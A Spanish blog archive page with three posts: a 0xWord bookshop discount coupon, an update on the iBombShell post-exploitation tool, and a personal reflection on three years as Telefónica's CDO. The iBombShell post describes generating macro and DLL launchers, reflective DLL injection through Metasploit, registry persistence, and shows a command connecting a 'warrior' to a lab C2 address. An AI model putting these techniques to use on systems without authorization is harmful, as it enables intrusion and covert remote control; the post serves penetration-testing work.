viernes, mayo 31, 2019

Feria del Libro 2019: 10% descuento en 0xWord con el cupón: FERIALIBRO2019 #ferialibromadrid #flm19

Coincidiendo que comienza la Feria del Libro de Madrid 2019, hemos sacado un cupón descuento en 0xWord para que puedas conseguir el material del catálogo con un 10% de descuento. El código que debes utilizar es FERIALIBRO2019. Este cupón estará disponible desde las 00:00:00 del día 31/05/2019 hasta las 23:59:59 del 02/06/2019.

Figura 1: Feria del Libro 2019: 10% descuento en 0xWord con el cupón:
FERIALIBRO2019 #ferialibromadrid #flm19

El cupón es para todos los libros de 0xWord, para las novelas de 0xWord Pocket, para todos los packs oferta que tenemos, para los VBOOKs, para los cómics de 0xWord Cómics y el resto de productos que haya disponible en catálogo, como los pocos peluches nuevos que hemos hecho de Cálico Electrónico y la FOCA, las pegatinas y los posters que me hice para mi mismo.


No es un gran descuento, pero los precios a los que están los productos están muy ajustados, y mantener los que tienen con el aumento de costes de las materias primas para hacer los libros, y pagar a los autores hace que sea casi imposible dar más.


Ya sabéis que desde que nació, 0xWord es una editorial con un espíritu Low-Cost y los márgenes son muy ajustados haciendo que publicar algunos libros sea una apuesta enorme, así que os agradecemos a todos los que habéis comprado o compráis nuestros productos. Por ayudarnos a mantener vivo este proyecto, que cada día es más complicado conseguir que siga siendo posible mantener la editorial que más libros de hacking en española ha editado. Gracias de verdad por ayudarnos a mantener vivo este rinconcito con el que tanta gente hemos aprendido.

Saludos Malignos!

jueves, mayo 30, 2019

iBombShel: Últimas novedades de un proyecto creciendo

De nuevo llega la hora de echar mano del proyecto iBombShell y ver cómo está evolucionando y las novedades en las que se está trabajando, para que puedas sacar el máximo partido a tus próximos proyectos de Ethical Hacking con esta herramienta de post-explotación. Todas las novedades se encuentran en la rama Dev dentro del repositorio de GitHub.

Figura 1: iBombShel: Últimas novedades de un proyecto creciendo

A continuación, se irán describiendo los cambios y novedades que se han producido en nuestra herramienta durante este último periodo en el que no os hemos contado nada. Vamos a ello.

Funcionalidad ‘global’

Hasta ahora, para configurar las variables del módulo, solo existía “set”, pero en cada cambio de módulo las variables se reiniciaban, algunas opciones se repetían entre módulos (por ejemplo, warrior), por ello se ha agregado la posibilidad de que las opciones se guarden globalmente, el uso es muy simple: global [opción] [valor]. Se puede ver en la imagen siguiente:

Figura 2: Ejemplo de uso de 'global' [opción] [valor]

Esta función configura la opción tanto de manera local (como haría set), como global. La ventaja, que con configurar una vez la opción nos va a valer para el futuro, permitiendo también hacer el cambio en local en determinados momentos sin afectar al resto.

Carga de instrucciones a partir de un fichero

Para lanzar iBombShell y cargar las instrucciones a través de un fichero, lo único que hay que hacer es agregar el flag -f o --file. Ejemplo de lanzamiento:
py ibombshell.py -f C:\Users\b.jeg\Documents\listener.ibs. 
Se puede ver en el siguiente vídeo cómo funciona esta nueva característica en el que se lanza un conjunto de instrucciones a ejecutar secuencialmente.


Figura 3: Ejemplo de iBombShell con fichero de comandos

El fichero debe contener una instrucción por línea. En el ejemplo del vídeo se lanzan tres instrucciones secuenciales: load, show y run.

Generaciones de código para lanzar iBombShell


Dentro de la herramienta, en la parte C2 se ha decidido agregar la posibilidad de generar códigos que permitan lanzar iBombShell. Actualmente se permite generar para cmd, Powershell, rubber, macro (ver figura siguiente) y dlls.

Figura 4: Generando macro para un warrior

A la hora de abrir un nuevo warrior a partir de una DLL los pasos que tenemos que hacer son muy sencillos, y se pueden resumir en la siguiente lista:
1. Lanzamos en iBombShell un listener. 
2. Generamos la DLL con la dirección IP, puerto y arquitectura (x86 o x64). 
3. Lanzamos la inyección desde Metasploit (se requiere una sesión y usar el módulo windows/manage/reflective_dll_inject), y ya tenemos acceso a la máquina objetivo desde iBombShell.
La mejor forma de entenderlo es viendo el siguiente vídeo que dejo a continuación con este mismo ejemplo. Échale un ojo.


Figura 5: PoC de generación de una DLL en IbombShell
para ejecutar un warrior desde Metasploit

En el vídeo ya se cuenta con un meterpreter abierto en la máquina víctima porque no era el objetivo mostrar cómo conseguir la sesión. Para aprender mucho sobre eso, puedes adquirir el libro de nuestro compañero Pablo González de Metasploit para Pentesters [4ª Edicion] donde explica muchas formas de conseguirlo.

Guardar y cargar funciones en el registro de Windows

Está funcionalidad no es nueva, pero se ha completado, permitiendo (una vez guardadas las funciones) el uso de iBombShell en entornos sin red. El comportamiento de la herramienta se puede ver en el siguiente vídeo.


Figura 6: Cargar y Guardar configuraciones de iBombShell en el registro de Windows

Al usar la función savefunctions se guardan las funciones cargadas en memoria en el registro de Windows, posteriormente para lanzar iBombShell tiramos de el comando en Base 64 que se puede encontrar en el Github, que se encargará de comprobar el registro para ver si tiene que cargar las funciones de ahí o pasar a Internet.

Agregada posibilidad de usar Proxy

Recientemente se agrego la posibilidad de usar un proxy para iBombShell, para hacer uso de esta utilidad, basta con agregar la flag -proxy y pasarlo en el formato ‘IP:PORT’. Un ejemplo de uso a la hora de abrir un warrior es ejecutar el siguiente comando:
console -Silently -proxt 127.0.0.1:8000 -uriConsole http://192.168.56.101:8080
Colaboración iBombShell C2 en .Net

Hace un tiempo mi compañero Pablo González hablo en este blog sobre las colaboraciones que recibió iBombShell por parte de la comunidad, y entre ellas contábamos con Gaizka (un chico que apenas está terminando de la ESO), que estaba desarrollando una interfaz gráfica en .NET. Y actualmente ha mutado convirtiéndose en una gran utilidad, el código de este proyecto se puede ver en su GitHub. La interfaz tiene la pinta que se ve en la Figura 7.

Figura 7: Interfaz de iBombShell C2 en .NET

Las respuestas que generan todos los Warriors que están conectados se van almacenando en el log, que se puede consultar en todo momento, tal y como se ve en la imagen siguiente.

Figura 8: Log de las respuestas de los warriors

Un gran trabajo, desde aquí mandar la enhorabuena a Gaizka y animarle a seguir aprendiendo y trabajando así de duro. Toda colaboración de la comunidad es bienvenida, tanto en forma de desarrollo + pull-requests, como ideas o reporte de bugs. A parte de todo lo contado en el artículo se han agregado módulos para obtener las DLLs del sistema y nuevos banners

Más Referencias

Por si quieres ampliar información y conocer más sobre iBombShell, aquí tienes todos los recursos publicados hasta la fecha sobre la herramienta, con toda la información que tenemos disponible.

- [GitHub] iBombShell
- [White Paper] iBombShell: Dynamic Remote Shell
- [Blog Post] Pentesting MacOS & Windows with iBombShell
- [Blog Post] iBombShell: Tu Shell de pentesting en MacOS con PowerShell
- [Blog Post] iBombShell: Creando una función para MacOS
- [Blog Post] iBombShell: Environment Injection in Windows 10
- [Blog Post] iBombShell: Crear módulo para extracción de claves SSH privadas
- [Blog Post] iBombShell: UAC Bypass con Mocking Trusted Directories
- [Blog Post] iBombShell: Nuevas funciones presentadas en BlackHat Europe 2018
- [Blog Post] iBombShell: Cómo saltarse AMSI y Windows Defender
- [Blog Post] iBombShell: Cómo hacer un popup phishing
- [Blog Post] BlackHat Arsenal: Tools for Research & Pentesting -> iBombshell
- [Blog Post] iBombShell: Módulo de RID Hijacking & C2 GUI en .Net
- [Blog Post] iBombShel: Últimas novedades de un proyecto creciendo

Autor: Josué Encinar García (@JosueEncinar), autor del blog BoomerNiX y Security Researcher en ElevenPaths y en el equipo de Ideas Locas de la unidad CDO de Telefónica.

miércoles, mayo 29, 2019

Más de 1.000 días como CDO son solo el comienzo }:)

Ayer me puse guapo. Bueno, tan guapo como se puede estar siendo lo que se es. Digamos que me afeité y me puse mi ropa habitual para hacerme unas fotos que puedan ser utilizadas por el equipo de prensa y comunicación. Y es que de la foto anterior que tengo en la web del Comité Ejecutivo del Grupo Telefónica tiene ya tres años - que ya ha habido que cambiar por una con cicatrices }:) -.

Figura 1: Más de 1.000 días como CDO son solo el comienzo
Tres años hace ya que me hice las dos fotos que he utilizado en muchas conferencias. La que está en la web para descarga con mi gorrito, y también la que no usamos en la web, en la que parece que voy a decir eso de: “What else?”. Con esta última me han caído muchos chistes en estos tres años de mis compañeros.


Y es que parece que fue ayer cuando entré por primera vez en la Sala del Comité Ejecutivo de Telefónica en el Edificio Central de Distrito C como el nuevo CDO (Chief Data Officer), para sentarme en una esquina y aprender mucho más de lo que podría haberme imaginado por mucho que lo hubiera intentado o me lo hubieran contado.


View this post on Instagram

A post shared by Chema Alonso (@chemaalonso) on

Más de 1.000 días. No me había parado a pensarlo hasta hoy. Un millar de días con un montón de cosas hechas y por hacer. Aventuras de todo tipo, con muchos cambios. Cambios que suceden de forma muy rápida. Muy, muy rápida. Y sales de una y te metes en otra aventura.


El ritmo de esta compañía hace que los minutos vuelen y que no te des cuenta de lo rápido que se va el tiempo. Como cuando te lo estás pasando bien que no notas para nada que las partículas del tiempo están escapándose por la espalda como furtivos que se deslizan por las sombras. Y cuando levantas la cabeza y miras el calendario dices… ¿Ya han pasado tres años?


Con la de cosas que he vivido en estos tres años me da para llenar un par de vidas. Y llenarla de cosas geniales. Y solo puedo estar agradecido por haber podido vivir estos tres años. Con mis compañeros. Con mi equipo. Con mis amigos. En este pedazo de compañía que te atrapa y te hace prisionero emocional. De la que no te puedes ir sin dejarte un trozo dentro.





A post shared by Chema Alonso (@chemaalonso) on

He vivido cosas geniales, y conocido a gente espectacular con la que me he enriquecido con su impronta y conocimientos. Me llevo momentos geniales y curiosos con muchos de ellos que me dan para escribir dos o tres libros con la experiencia que ha sido conocerlos. Personas y personalidades de todo tipo que dan para un largo etcétera que voy coleccionando en mi Instagram. Yo las publico ahí, y mi madre las imprime para colgarlas en casa.


Me he pasado tres años haciendo cosas, viajando, enredando, compartiendo ideas, trabajos, visiones, haciendo, rectificando, aprendiendo, cambiando, dando vueltas a BigData, IA, Ciberseguridad, Privacidad, Cognitive Services, hacking, Machine Learning o cualquier cosas que se te pase por la cabeza que tenga que ver con tecnología. Casi no me he dejado ninguna por tocar.







Gracias. Tal vez me maten mis compañeros por publicar esta foto, pero he visto que hay muchas en Twitter ya en las que se les ve disfrazados, así que, no hay vuelta atrás. Tal vez me maten por publicar esta foto, pero creo que representa lo que son unos compañeros. Guillermo y Mariano son mis compañeros en Telefónica, llevan las áreas de CCDO y Global Resources. Con ellos discutimos, debatimos, intercambiamos opiniones, alineadas y encontradas, nos dejamos recursos para sacar los proyectos del otro a tiempo. Nos llamamos para ver cómo vas con AURA, cómo vas con SmartWiFI, cómo hacemos para la parte de UNICA, qué FullStack hay que acelerar. Y los admiro. Son gente inteligente, cabal, trabajadora y de la que me puedo fiar y me fío. Me apoyo en ellos para sacar las cosas adelante, y es un placer trabajar con ellos. El jueves, con el único espíritu de divertir a todos los compañeros, y hacer más divertido nuestro #reencuentro tuvieron el valor de disfrazarse de rockeros. Yo pedí una foto para mi Instagram, y es este momento. Yo estoy feliz de trabajar con ellos, y orgulloso de que sean como son. Gracias Guillermo, Gracias Mariano. Gracias Telefónica. Proud++
A post shared by Chema Alonso (@chemaalonso) on

Pero también, y lo que es más importante aún - me he pasado tres años con compañeros geniales dentro de la casa. Compañeros dentro de Telefónica que han hecho que merezca la pena este trabajo. Son los que hacen que tenga ganas de levantarme e ir al trabajo todos los días. Compañeros en Telefónica que me enseñan, me cuidan, me ayudan, me corrigen y me transmiten conocimiento y sabiduría. En áreas globales, en los países en los que esta compañía tan grande tiene presencia y en los rincones más inesperados de esta maravillosa empresa.


He sido afortunado de vivir la experiencia de montar Informática 64, fui afortunado de poder lanzar Talentum, de hacer posible 0xWord, de crear ElevenPaths, de convertirme en CDO y en estos tres años poner a funcionar LUCA, la 4º Plataforma, AURA, Movistar Home y todos los proyectos pequeños y grandes que hemos ido haciendo. Ha sido un pedazo de viaje hasta ahora.


Pero solo el principio, porque ser CDO de un grupo como Telefónica, mientras mis compañeros me sigan dando la confianza para serlo, es un honor al que no puedo decir que no. Así que espero poder estar aquí, año a año, celebrando trescientos sesenta y cinco días más, haciendo este trabajo que tanto me gusta, que como pone en el título: Deseo que 1.000 días sean solo el comienzo.

Saludos Malignos!

Entrada destacada

Tu Latch "Hack Your Innovation Contest": Haz un PoC & Hack por 1.000 €

El pasado Telefónica Innovation Day 2024 lanzamos oficialmente el " Tu Latch Hack Your Innovation Contest " en el que repartimos ...

Entradas populares